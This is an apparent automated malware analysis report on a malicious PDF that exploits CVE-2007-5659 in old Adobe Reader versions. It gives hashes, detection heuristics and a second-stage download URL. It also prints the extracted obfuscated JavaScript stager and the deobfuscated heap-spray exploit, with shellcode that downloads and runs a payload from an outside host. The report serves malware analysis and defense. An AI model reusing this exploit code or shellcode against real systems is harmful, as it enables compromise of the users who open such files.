Malicious PDF — malware analysis report

Static analysis result for SHA-256 029111fdb352cc6f…

MALICIOUS

PDF

17.3 KB
MD5: ae62ee65e507a31ceb3fe011b59c21dc SHA-1: d3690459289d0e369a9b63f4e0a19ceff08d3df2 SHA-256: 029111fdb352cc6fe7d42ddbbc764b252c59d0875c648f5fd32e41eed72d5a11
366 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The sample is a PDF file that contains obfuscated JavaScript. This JavaScript is designed to exploit CVE-2007-5659 in Adobe Reader, specifically targeting versions between 7.1 and 8.11. The script attempts to download a second-stage payload from the URL http://bikora.info/page/gold.php/n00a106201r0007R43329fdcXaa7652dfY6d0a7020Z0100f070. The presence of anti-analysis checks and multi-stage obfuscation indicates a deliberate effort to conceal malicious activity.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 10

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 5 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Obfuscated multi-stage PDF JavaScript dropper high PDF_JS_OBFUSCATED_DROPPER
    PDF JavaScript shows 4 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers — OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible via static analysis.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Exploit.Agent-35901 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35901
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://bikora.info/page/gold.php/n00a106201r0007R43329fdcXaa7652dfY6d0a7020Z0100f070 Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0009_000.js
4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d		 pdf-javascript-stream PDF /JS object 9 at offset 0x42EB 469 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}
legacy_pdfkit_stage_000.js
292f91d5739bf89158f41a70c7ab6b147a697e09ce14dd32f10bcc9989164792		 deobfuscated-js z-percent UTF-16BE base-21 decoded JavaScript at offset 0x1A94 5292 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var Pk_1e1Vy__xNtA = new Array();var JQxh2uOg_6p_W = 0;var g12s__t = "";function e5_0JP(HK_7_i_21jqBUt, O__OW5__780){var S4jVgo = O__OW5__780.toString();var pA3__Sv4amo4_M = "";for(var VeVD6vcPbx = 0; VeVD6vcPbx < S4jVgo.length; VeVD6vcPbx++) {var a5__j_515s = parseInt(S4jVgo.substr(VeVD6vcPbx, 1));if (!isNaN(a5__j_515s)) {a5__j_515s = a5__j_515s.toString(16);if (a5__j_515s.length == 1) { a5__j_515s = "0" + a5__j_515s; }else if (a5__j_515s.length != 2) { a5__j_515s = "00"; }pA3__Sv4amo4_M = a5__j_515s + pA3__Sv4amo4_M;if (pA3__Sv4amo4_M.length == 8) {break;}}}while(pA3__Sv4amo4_M.length < 8) { pA3__Sv4amo4_M = "0" + pA3__Sv4amo4_M; }var MM7__k0jxAh = HK_7_i_21jqBUt.toString(16);if (MM7__k0jxAh.length == 1) { MM7__k0jxAh = "0" + MM7__k0jxAh; }else if (MM7__k0jxAh.length != 2) { MM7__k0jxAh = "00"; }pA3__Sv4amo4_M = "3" + MM7__k0jxAh + "P" + pA3__Sv4amo4_M;return pA3__Sv4amo4_M;}function p4_wh_m__1Od_h(HqcH___81__5qUg, nwr_32M__k){var X8_t2_x3bE_xOo = new Array("");var VO6_my6lbiUrj = HqcH___81__5qUg;var OJ__c7v6_Qn;if ((OJ__c7v6_Qn = HqcH___81__5qUg.lastIndexOf("%u00")) != -1) {if (OJ__c7v6_Qn + 6 == HqcH___81__5qUg.length) {X8_t2_x3bE_xOo[0] = HqcH___81__5qUg.substr(OJ__c7v6_Qn + 4, 2);VO6_my6lbiUrj = HqcH___81__5qUg.substring(0, OJ__c7v6_Qn);}}OJ__c7v6_Qn = 1;for (VeVD6vcPbx = 0; VeVD6vcPbx < nwr_32M__k.length; VeVD6vcPbx++) {var YYJ_04ij_Yj_F = nwr_32M__k.charCodeAt(VeVD6vcPbx).toString(16);if (YYJ_04ij_Yj_F.length == 1) { YYJ_04ij_Yj_F = "0" + YYJ_04ij_Yj_F; }X8_t2_x3bE_xOo[OJ__c7v6_Qn] = YYJ_04ij_Yj_F;OJ__c7v6_Qn++;}VeVD6vcPbx = X8_t2_x3bE_xOo[0].length ? 0 : 1;X8_t2_x3bE_xOo[OJ__c7v6_Qn] = "00";X8_t2_x3bE_xOo[OJ__c7v6_Qn + 1] = "00";OJ__c7v6_Qn += 2;if ((X8_t2_x3bE_xOo.length - VeVD6vcPbx) % 2) {X8_t2_x3bE_xOo[OJ__c7v6_Qn] = "00";}while(VeVD6vcPbx < X8_t2_x3bE_xOo.length) {VO6_my6lbiUrj += "%u" + X8_t2_x3bE_xOo[VeVD6vcPbx + 1] + X8_t2_x3bE_xOo[VeVD6vcPbx];VeVD6vcPbx += 2;}VO6_my6lbiUrj += "%u0000";return VO6_my6lbiUrj;}function kius_M_36_B(xVDC1nTUMoL, uEW_aHCm){while (xVDC1nTUMoL.length*2<uEW_aHCm) {xVDC1nTUMoL += xVDC1nTUMoL;}xVDC1nTUMoL = xVDC1nTUMoL.substring(0,uEW_aHCm/2);return xVDC1nTUMoL;}function G_b15_K_u_o(mG_G1c_46R8Dw, tL0VK1l_Uq, k__3BE){var o_y0_n_V___8sk = 0x0c0c0c0c;var xVDC1nTUMoL = unescape(tL0VK1l_Uq);var nwr_32M__k = e5_0JP(mG_G1c_46R8Dw, k__3BE);var YX8__H3TB2__oN = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var HqcH___81__5qUg = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%ufbe9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u2068%u7d80%u330c%u0374%ueb96%u8bf3%u0868%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%uf238%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%u00e8%uffff%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u4b70%u4751%u6a6b%u4370%u004c%u7468%u7074%u2f3a%u622f%u6b69%u726f%u2e61%u6e69%u6f66%u702f%u6761%u2f65%u6f67%u646c%u702e%u7068%u6e2f%u3030%u3161%u3630%u3032%u7231%u3030%u3730%u3452%u3333%u3932%u6466%u5863%u6161%u3637%u3235%u6664%u3659%u3064%u3761%u3230%u5a30%u3130%u3030%u3066%u3037";app.qj_4__1_Fx = unescape(p4_wh_m__1Od_h(HqcH___81__5qUg, nwr_32M__k));var U218i45FGIsr8 = 0x400000;var Y_Dp_8_JR5wK = YX8__H3TB2__oN.length * 2;var uEW_aHCm = U218i45FGIsr8 - (Y_Dp_8_JR5wK+0x38);xVDC1nTUMoL = kius_M_36_B(xVDC1nTUMoL, uEW_aHCm);var xjX_Bp = (o_y0_n_V___8sk - 0x400000)/U218i45FGIsr8;for (var yCgC6g0e___t = 0; yCgC6g0e___t < xjX_Bp; y
... (truncated)
deobfuscated.js
0476eb05c01d0763a3dd92fa596efcf81d5979e8df4a9604f5404196e477a20a		 deobfuscated-js PDF JavaScript deobfuscation pass 170287 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
0eac11549b699280615b3785699j0869aa6f0g801h7a36a9a67jb7748hbe806a236j27064k7g8h6b88ac677f364ibf2a2d7h5b2g440ca990214h9j47765a8b3969623h5fa401954b4a82772e6e7i257a9526988b8g5a4kb23h8f8746b61bad8e3a695cb83e0g0c2d9c029i03c3373gbh1a047d2aaf05944244440gb8244f561a6h787c5a1i391a7j1i6d9a2155728c8b834d1h991h96390g4h9c6jak083iaf5j07b4033i3b7d6f0j842aa741a3aa4eba2j6j61372630a77080332b14283e5d4jb11aaa238d2i6ibbbj45416c53b099488g864k9e020f29751dbk7g4068b1aj0d143g2e9i4kb86f1i6eag68bfb71k2eb8038e2a2e862j0i7kb4b10f3ka0ae2ba849613h8g730f017352a82b036e4g0j7g9fafbg968eaa3eah5iae956d7haaa49b3fa11i90460k0c5e526e76b80h8f9j63092bah76697a6a36547hbk872d27275b674g5g2a3477906i1i73b84k25488b4g723ea33j128j6c681a354hb011729i4817c2146b2j1i3ia87e3h8d478gai7e351c3b5h292j2g54408e442b58103c4k1fa32g35c27e2ia912bkbh3g706k3h36b37a920g1j7j9k0g68a60g17066fa9ad3a9k9j019c8j0k080e8513652e60b91hai002409aa7437c3c05i801e1da21h249j795b3haa5a61a03e13269f8e3e781a146362946bbk9ca34d207962983a43c1bd459jah6e3c0i0kbh4j6k7h0jbe89852f3a019ib33h55721054bh5j26bh53328a27467g6cc0a88d4cc06dab861i3e4c539b864j2i128773780b317c8038863f2b0dbj129ic2ad49af756f2ba30j198a8cah113c3i67995609ba442b52aca6294fbg6i4694a76b9i528h9j197d6f7c2db69j53223c607500ada672c1758fa9a1724i8k2j035j5fbe58679f2834314jb4ai393f9a797425112h527d1a1j9a3f8j3a7i646j541153b6474340a536648c014302398879a1396h4c589e640k2e4k95a76e0b8g483c0g3j311j3b75ajacbj52333fb57513bc0692347gbe682j144g2421bg1k8f6a26a736b7b1498ha1bi9a6f6j6h0c3k08b19975b1a08b54710a9k0281a184c1b16fac610f80c3358e00bg4c0c7ka5652f1jbb1963882f188i6f8e522a02beaj8d7j6a98aj638f44403a8688526j53526d3k5j1296129j846h9j90b161252hbb975f5i7g2798173i682j4i0j2g0c869453532hb64j070ja01i6c4d52095c454j77103b9j6g575d71be3448ag6197b48j5bbh513c1b4j929943b81fb88g5e51301a490g416bb196aebea9573gb54a009k5fa39692275a6433bj374b5b4k94b25766c04430a71i76b83j568e7h7g9310c09h167h61376b6d4da138110h7b0f8g9j3a6f8961a5821db47103aj8j364f7a2622311jb53kb04g031g295d5f3k07ab7e23ak63a5a5165c4e727ea759166j694i0c2e0f2c8bb704814a6gb1ag08073e2g8c678h573383bd56bbc1c3ba1e2d95670i7c1211b1c0a1c32k9aae4fae7b336h9faia8096c137a0kai4e781aa07601998ba7a5bh911j8c949973a4adah3h6g1e9f230d2b914k9i9k1i177719903e3592893f5867454k5c915501171c5j284k632jb18cba74b140ad5k49687g5i9h4fa1551h5j3c381b29548908509k53b9b40f5h0e26610385687e48991j7i5k1k4b5fc11j666i14b04c024e1h0a4e3abg5c5a2ia13d9012a5ah2e7i6d2f56139a661c3bajai3i8h1a0j56158ib8bd3i77b315bc7k2i1a07600b4d32608aaebh04b6067j5a28b8c181ae1k20a21e1k91775d3hbh427k0h69310k0b8c3h541a0e438kaj8j8e170d7g5iae950c5j7b808c3590a15e43bk349h57459i05118i83734h168ib33659744655ai855abh2f1b880d4d9268b17e7b42195799b21c2d7f8k5f82400dbc5j5d9f00124ib33c8964329b9b9j9c0d2761a5827f520k03b3848cb90i662i34503f06ac26068h9kb04e5j964k0d85bc6k94815haa3a60694d04aga0833a727i8d007ea67029a58f878a536j8i2h95836309966d165b5f4b8jb1152j4fa65a8630b9506448ac4ka540bd786j5h741e1i419c4b4d476e2j58720a3f0i30bi91b033954c3f778k392i4abdb52e15630d1k98003ja82i9cc207014g333j219c2b0510621c44b03db0bh1i1b13b4058735c01d590g1c73b8bi8h9a90796i0c4k9i12a23k0987bb809643c025a107b40ja09f8d61beakbbb58a8g1076a77e78352j59b10h9eb0280ba05f8e4b4j9ibca8849c6c6d7f41933776608d99879e793jah1h53008kb997b9438fbd8b942d5h39ah8f8c75555d135c94365i1jai1254661859c09k641d210f4k777d8g176c3i6h8b053fbk5a33716d2e3g8abf6gbc2fb65b983a2gba2e6g6d5i9911bd8e5e722d0f2jbk444ib2c292c207573k9j4a029i48a2876d04504ec095bh1926255b8e7c4a1i4421802k4eb835846952635f1ab899195j390f646d6hb11531135j0a9k0f3k4h863f0gab34bc8100aa54b8446i4i132k30a958b34gbiah0j2d28238g2e8k36a56i6k113j2c3j5g691k7c4k96782g0a1g3j12a8b7046f3k8d799092a20b008e65117c2f89135c8jbd2211080e035e0d77409396820bb13kaa8b4b1c47555ca8b7b70f3j4ga846c06e7hb26habafad6cb0a43i8f5b9h8h8g93af7d87415kak6k54910064468j800j17650f9k16248d827b7b9i306g82bb6b0e594f6h5b8b5730b151aj3ibc3db1524978597g9j4ca44e12a256733650729d2243a453bhb71j5f0h4167bj8k3c9544b1198g25b61j260634686g26913c2j5jai344e54b6566gb67g456214922e1b4g441c28bda8894g4cbh18008i0716470i9k8ab532a9b933c265423f068e0f662i9gbeae25323338aa672ha1c1818da65391050377734c67087i839f3554bj038c5g6603173c99078kba10c14d26ai7jb03i4kb7a654b3bc5g1h0836054d74a6aca89gaj4a30219ka11k5j6b048bc18a3a162355a1
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.